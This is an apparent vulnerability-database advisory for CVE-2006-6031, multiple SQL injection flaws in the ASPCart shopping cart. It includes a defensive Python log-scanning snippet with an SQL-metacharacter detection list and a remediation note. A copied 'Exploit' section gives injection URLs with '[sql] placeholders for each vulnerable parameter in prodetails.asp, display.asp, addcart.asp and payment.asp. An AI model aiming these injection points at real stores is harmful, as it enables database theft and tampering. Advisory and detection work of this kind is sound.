ASPCart Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1192810 Vulnerability type: SQL injection
Published: 2006-11-21 Updated: 2006-11-21
CVE ID: CVE-2006-6031 CNNVD-ID: CNNVD-200611-355
Platform: N/A CVSS score: 7.5
|Vulnerability source
https://www.securityfocus.com/bid/87186
https://cxsecurity.com/issue/WLB-2006110102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-355
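|Vulnerability details
Greater Cincinnati Internet Solutions (GCIS) ASPCart contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via (1) the prodid parameter in (a) prodetails.asp; (2) the page parameter in (b) display.asp; the (3) custid, (4) item, (5) price, (6) custom, (7) department, (8) start, (9) quantity, (10) submit, (11) custom1, (12) custom2 or (13) custom3 parameters in (c) addcart.asp; or (14) the customerid parameter in (d) payment.asp.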
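For defenders triaging an exposed installation, the following added example (not part of the original advisory or of ASPCart) checks logged requests for SQL metacharacters in exactly the script and parameter pairs listed above. The function names, the token list and the sample requests are constructed for illustration; it assumes form bodies are available from a WAF or proxy capture, since standard access logs omit them.

```python
import posixpath
from urllib.parse import parse_qsl, urlsplit

# Script basename -> parameters named in the CVE-2006-6031 description above.
WATCHED = {
    "prodetails.asp": {"prodid"},
    "display.asp": {"page"},
    "addcart.asp": {"custid", "item", "price", "custom", "department", "start",
                    "quantity", "submit", "custom1", "custom2", "custom3"},
    "payment.asp": {"customerid"},
}
# Assumed token list: the quote shown in the advisory plus common SQL punctuation.
SUSPICIOUS = ("'", '"', ";", "--", "/*")


def flag_request(target, body=""):
    """Return sorted (script, param) pairs whose decoded value has SQL metacharacters.

    target: request target from a log line, e.g. "/shop/addcart.asp?custid=1"
    body:   form-encoded POST body, if it was captured
    """
    parts = urlsplit(target)
    # IIS paths and ASP Request names are case-insensitive; the shop may sit in a subfolder.
    script = posixpath.basename(parts.path).lower()
    params = WATCHED.get(script)
    if params is None:
        return []
    hits = set()
    for source in (parts.query, body):
        # parse_qsl percent-decodes once, matching what the ASP page receives.
        for name, value in parse_qsl(source, keep_blank_values=True):
            if name.lower() in params and any(tok in value for tok in SUSPICIOUS):
                hits.add((script, name.lower()))
    return sorted(hits)


def scan(requests):
    """Return (target, hits) for every request that touches a watched parameter."""
    results = ((target, flag_request(target, body)) for target, body in requests)
    return [(target, hits) for target, hits in results if hits]


# Constructed sample input: (request target, captured POST body).
SAMPLE_REQUESTS = [
    ("/prodetails.asp?prodid=42", ""),
    ("/prodetails.asp?prodid=42%27", ""),
    ("/shop/AddCart.asp?custid=1&item=mug", "Quantity=1%27--&custom1=blue"),
    ("/display.asp", "page=2"),
    ("/search.asp?q=o%27brien", ""),
]
```

A hit is a triage signal only, because a legitimate item name can contain an apostrophe. The durable fix is in the ASP code itself: bind these parameters through parameterized ADODB.Command queries instead of concatenating them into SQL strings.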
|Exploit
vendor site: http://www.aspcart.com
product: ASP Cart 
bug: multiples injection sql post & get
global risk: high !

injection get :
http://site.com/prodetails.asp?prodid='[sql]

injection (post) :

1)http://site.com/display.asp 
Variables:
/display.asp?page='[sql]

2)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid='[sql]

3)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item='[sql]

4)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price='[sql]

5)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom='[sql]

6)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department='[sql]

7)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start='[sql]

8)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start=1&quantity='[sql]

9)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start=1&quantity=1&submit='[sql]

10)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start=1&quantity=1&submit=1&custom1='[sql]

11)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start=1&quantity=1&submit=1&custom1=1&custom2='[sql]

12)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start=1&quantity=1&submit=1&custom1=1&custom2=1&custom3='[sql]

12)http://site.com/payment.asp 
Variables:
/payment.asp?customerid='[sql]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com
|Affected products
Gcis Aspcart 0
|References

Source: BUGTRAQ
Name: 20061114 ASPCart [multiples injection sql (post & get)]
Link: http://www.securityfocus.com/archive/1/archive/1/451858/100/0/threaded
Source: BID
Name: 21152
Link: http://www.securityfocus.com/bid/21152
Source: VUPEN
Name: ADV-2006-4580
Link: http://www.frsirt.com/english/advisories/2006/4580
Source: SREASON
Name: 1899
Link: http://securityreason.com/securityalert/1899
Source: SECUNIA
Name: 22946
Link: http://secunia.com/advisories/22946